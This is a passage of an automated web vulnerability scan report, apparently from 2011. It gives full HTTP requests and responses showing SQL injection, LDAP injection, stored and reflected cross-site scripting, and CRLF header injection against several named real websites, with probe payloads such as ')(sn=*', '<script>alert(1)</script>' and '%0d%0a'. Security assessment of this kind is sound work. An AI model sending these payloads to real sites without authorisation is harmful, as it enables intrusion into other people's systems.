Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/scripts.js

Issue detail

Request 1

GET /webroot/delivery/js/scripts.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 1

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:11 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:36:34 GMT
Content-Length: 6632

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

Request 2

GET /webroot/delivery/js/scripts.js''?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response 2

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:13 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:36:36 GMT
Content-Length: 4387

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...

1.19. http://www.trucklist.ru/webroot/delivery/js/windows/javascripts/window.js [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/windows/javascripts/window.js

Issue detail

The REST URL parameter 6 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 6, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Request

GET /webroot/delivery/js/windows/javascripts/window.js'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:51:14 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.11
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:51:14 GMT
Content-Length: 6670

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.20. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alert.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/windows/themes/alert.css

Issue detail

Request

GET /webroot/delivery/js/windows/themes/alert.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:31:38 GMT
Content-Length: 6660

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.21. http://www.trucklist.ru/webroot/delivery/js/windows/themes/alphacube.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/windows/themes/alphacube.css

Issue detail

Request

GET /webroot/delivery/js/windows/themes/alphacube.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:21 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:31:44 GMT
Content-Length: 6668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

1.22. http://www.trucklist.ru/webroot/delivery/js/windows/themes/default.css [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.trucklist.ru
Path:	/webroot/delivery/js/windows/themes/default.css

Issue detail

Request

GET /webroot/delivery/js/windows/themes/default.css'?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 404 Not Found
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:46:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.2.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 25 Apr 2011 14:32:03 GMT
Content-Length: 6664

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
   <title>TRUCKLIST.RU - ............ 404</title>
   <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
   <lin
...[SNIP]...
</b> You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '100') ORDER BY struct.sort_id LIMIT 0,1' at line 1 in <b>
...[SNIP]...

2. LDAP injection previous next

Summary

Severity:	High
Confidence:	Tentative
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 2a0e35b7bd3690da)(sn=* and 2a0e35b7bd3690da)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)(sn=*&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2a0e35b7bd3690da)(sn=exp=1&initExp=Mon Apr 25 14:36:04 2011&recExp=Mon Apr 25 14:36:04 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=2a0e35b7bd3690da)!(sn=*&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:04 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_2a0e35b7bd3690da)!(sn=exp=1&initExp=Mon Apr 25 14:36:04 2011&recExp=Mon Apr 25 14:36:04 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:04 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3. Cross-site scripting (stored) previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://learn.shavlik.com
Path:	/shavlik/index.cfm

Issue detail

The value of the h request parameter submitted to the URL /shavlik/index.cfm is copied into an HTML comment at the URL /shavlik/index.cfm. The payload 744fd--><script>alert(1)</script>aa703b77027 was submitted in the h parameter. This input was returned unmodified in a subsequent request for the URL /shavlik/index.cfm.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request 1

GET /shavlik/index.cfm?m=521&pg=372&h=0744fd--><script>alert(1)</script>aa703b77027&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Request 2

GET /shavlik/index.cfm?m=521&pg=372&h=0&hp=372 HTTP/1.1
Host: learn.shavlik.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=799534; CFTOKEN=57697702; __utmz=225610631.1303732848.1.1.utmgclid=CPC_jKTPt6gCFUh-5QodsROzEA|utmccn=PatchManagement|utmcmd=(not%20set)|utmctr=vulnerability%20management; __utma=225610631.313706594.1303732848.1303732848.1303732848.1; __utmc=225610631; __utmb=225610631.13.10.1303732848

Response 2

HTTP/1.1 200 OK
Connection: close
Date: Mon, 25 Apr 2011 12:47:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8

...[SNIP]...
<script>alert(1)</script>aa703b77027|372 -- -->
...[SNIP]...

4. HTTP header injection previous next
There are 4 instances of this issue:

http://ad.doubleclick.net/adj/lj.homepage/loggedout [REST URL parameter 1]
http://ad.doubleclick.net/dot.gif [REST URL parameter 1]
http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru [REST URL parameter 2]
http://pretty.ru/favicon.ico [REST URL parameter 1]

4.1. http://ad.doubleclick.net/adj/lj.homepage/loggedout [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/lj.homepage/loggedout

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 69b58%0d%0afb4aa952766 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /69b58%0d%0afb4aa952766/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=2623414837? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.livejournal.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/69b58
fb4aa952766/lj.homepage/loggedout;a=1;r=0;w=0;c=se;pt=se;vert=_code;sz=728x90;pos=t;tile=1;ord=2623414837:
Date: Mon, 25 Apr 2011 14:33:59 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.2. http://ad.doubleclick.net/dot.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload d65f3%0d%0ab88a010799e was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /dot.gifd65f3%0d%0ab88a010799e?1303741320269 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://games.mochiads.com/c/g/moon-volley/mvolley.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifd65f3
b88a010799e:
Date: Mon, 25 Apr 2011 14:56:32 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

4.3. http://bs.yandex.ru/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://bs.yandex.ru
Path:	/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ru

Issue detail

The value of REST URL parameter 2 is copied into the Location response header. The payload c396e%0d%0ac1277611b7a was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.

Request

GET /count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ruc396e%0d%0ac1277611b7a?67253133 HTTP/1.1
Host: bs.yandex.ru
Proxy-Connection: keep-alive
Referer: http://mail.ru/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: yandexuid=1981869761303741204

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 14:34:43 GMT
Server: Phantom/0.0.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI STA"
Last-Modified: Mon, 25 Apr 2011 14:34:43 GMT
Expires: Mon, 25 Apr 2011 14:34:43 GMT
Cache-Control: private, no-cache, no-store, must-revalidate, max-age=0
Pragma: no-cache
Location: http://bs.mail.ruc396e
c1277611b7a/count/108pZT9La4K40X00Zh4NwAO4M7sL0vi1R5aYYAZZY0AIgOvc0ue1aRpGIMG6auKDYm51VmG0,bs.mail.ruc396e
c1277611b7a,1981869761303741204?67253133
Content-Length: 0

4.4. http://pretty.ru/favicon.ico [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://pretty.ru
Path:	/favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9656f%0d%0a539e8d0607b was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9656f%0d%0a539e8d0607b HTTP/1.1
Host: pretty.ru
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: domhit=1; randomhit=177203261; LP_CH_C=love_cookies; __utmz=1.1303741245.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.850278810.1303741245.1303741245.1303741245.1; __utmc=1; __utmb=1.1.10.1303741245

Response

HTTP/1.1 302 Found
Server: nginx
Date: Mon, 25 Apr 2011 14:56:13 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Location: /a-main/param-notfound/login-9656f
539e8d0607b:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Mon, 25 Apr 2011 14:56:13 GMT
Content-Length: 100

5. Cross-site scripting (reflected) previous next
There are 68 instances of this issue:

http://ads.adxpose.com/ads/ads.js [uid parameter]
http://an.yandex.ru/code/47934 [target-ref parameter]
http://an.yandex.ru/code/57617 [target-ref parameter]
http://an.yandex.ru/code/66894 [target-ref parameter]
http://ar.voicefive.com/b/rc.pli [func parameter]
https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]
https://checkout.netsuite.com/core/ [name of an arbitrarily supplied request parameter]
http://ds.addthis.com/red/psi/sites/www.kronos.com/p.json [callback parameter]
http://event.adxpose.com/event.flow [uid parameter]
https://hourly.deploy.com/hmc/report/ ['"--></style></script><script>netsparker(0x000054)</script> parameter]
https://hourly.deploy.com/hmc/report/ [name of an arbitrarily supplied request parameter]
https://hourly.deploy.com/hmc/report/ [nsextt parameter]
https://hourly.deploy.com/hmc/report/ [register parameter]
https://hourly.deploy.com/hmc/report/index.cfm ['"--></style></script><script>netsparker(0x00004F)</script> parameter]
https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]
https://hourly.deploy.com/hmc/report/index.cfm [j_username parameter]
https://hourly.deploy.com/hmc/report/index.cfm [name of an arbitrarily supplied request parameter]
https://hourly.deploy.com/hmc/report/index.cfm [nsextt parameter]
https://hourly.deploy.com/hmc/report/index.cfm [register parameter]
https://hourly.deploy.com/hmc/report/index.cfm/%22ns=%22netsparker(0x000042) [name of an arbitrarily supplied request parameter]
https://hourly.deploy.com/hmc/report/index.cfm/%2522ns%253D%2522netsparker%25280x000048%2529) [name of an arbitrarily supplied request parameter]
http://ib.adnxs.com/ab [cnd parameter]
http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard [mbox parameter]
http://kroogy.com/favicon.ico [REST URL parameter 1]
http://learn.shavlik.com/shavlik/index.cfm [h parameter]
http://learn.shavlik.com/shavlik/index.cfm [m parameter]
http://mbox5.offermatica.com/m2/netsuite/mbox/standard [mbox parameter]
http://mbox9e.offermatica.com/m2/eset/mbox/standard [mbox parameter]
http://ok.mail.ru/cookie-token.do [client_id parameter]
http://ok.mail.ru/cookie-token.do [remove parameter]
http://pixel.fetchback.com/serve/fb/pdc [name parameter]
http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [height parameter]
http://pl.yumenetworks.com/dynamic_preroll_playlist.fmil [width parameter]
http://shopping.netsuite.com/s.nl [alias parameter]
http://shopping.netsuite.com/s.nl [name of an arbitrarily supplied request parameter]
http://tools.manageengine.com/forums/security-manager/forum.php [char parameter]
http://widgets.digg.com/buttons/count [url parameter]
https://www.controlscan.com/save_order.php [company parameter]
https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [_IG_CALLBACK parameter]
https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [__EVENTVALIDATION parameter]
https://www.fusionvm.com/FusionVM/DesktopDefault.aspx [name of an arbitrarily supplied request parameter]
http://www.google.com/search [tch parameter]
http://www.stillsecure.com/m/ [comments parameter]
http://www.stillsecure.com/m/ [company parameter]
http://www.stillsecure.com/m/ [email parameter]
http://www.stillsecure.com/m/ [firstName parameter]
http://www.stillsecure.com/m/ [lastName parameter]
http://www.stillsecure.com/m/ [phone parameter]
https://hourly.deploy.com/hmc/report/Netsparkercdbd6412ae00461e9f79a262b2aa7b0f.cfm [User-Agent HTTP header]
http://www.eset.com/business/server-security/linux-file [Referer HTTP header]
http://www.eset.com/us [Referer HTTP header]
http://www.eset.com/us/ [Referer HTTP header]
http://www.eset.com/us/business/products [Referer HTTP header]
http://www.eset.com/us/business/server-security/linux-file [Referer HTTP header]
http://www.eset.com/us/home/smart-security [Referer HTTP header]
http://www.eset.com/us/store [Referer HTTP header]
http://www.eset.com/us/styles/store-new.css [Referer HTTP header]
http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header]
http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]
http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]
http://ar.voicefive.com/bmx3/broker.pli [UID cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p91300630 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]
http://ar.voicefive.com/bmx3/broker.pli [ar_s_p81479006 cookie]
http://forums.manageengine.com/fbw [zdccn cookie]
http://forums.manageengine.com/fbw [zdccn cookie]

5.1. http://ads.adxpose.com/ads/ads.js [uid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ads.adxpose.com
Path:	/ads/ads.js

Issue detail

The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload 86c33<script>alert(1)</script>797754eeb was submitted in the uid parameter. This input was echoed unmodified in the application's response.

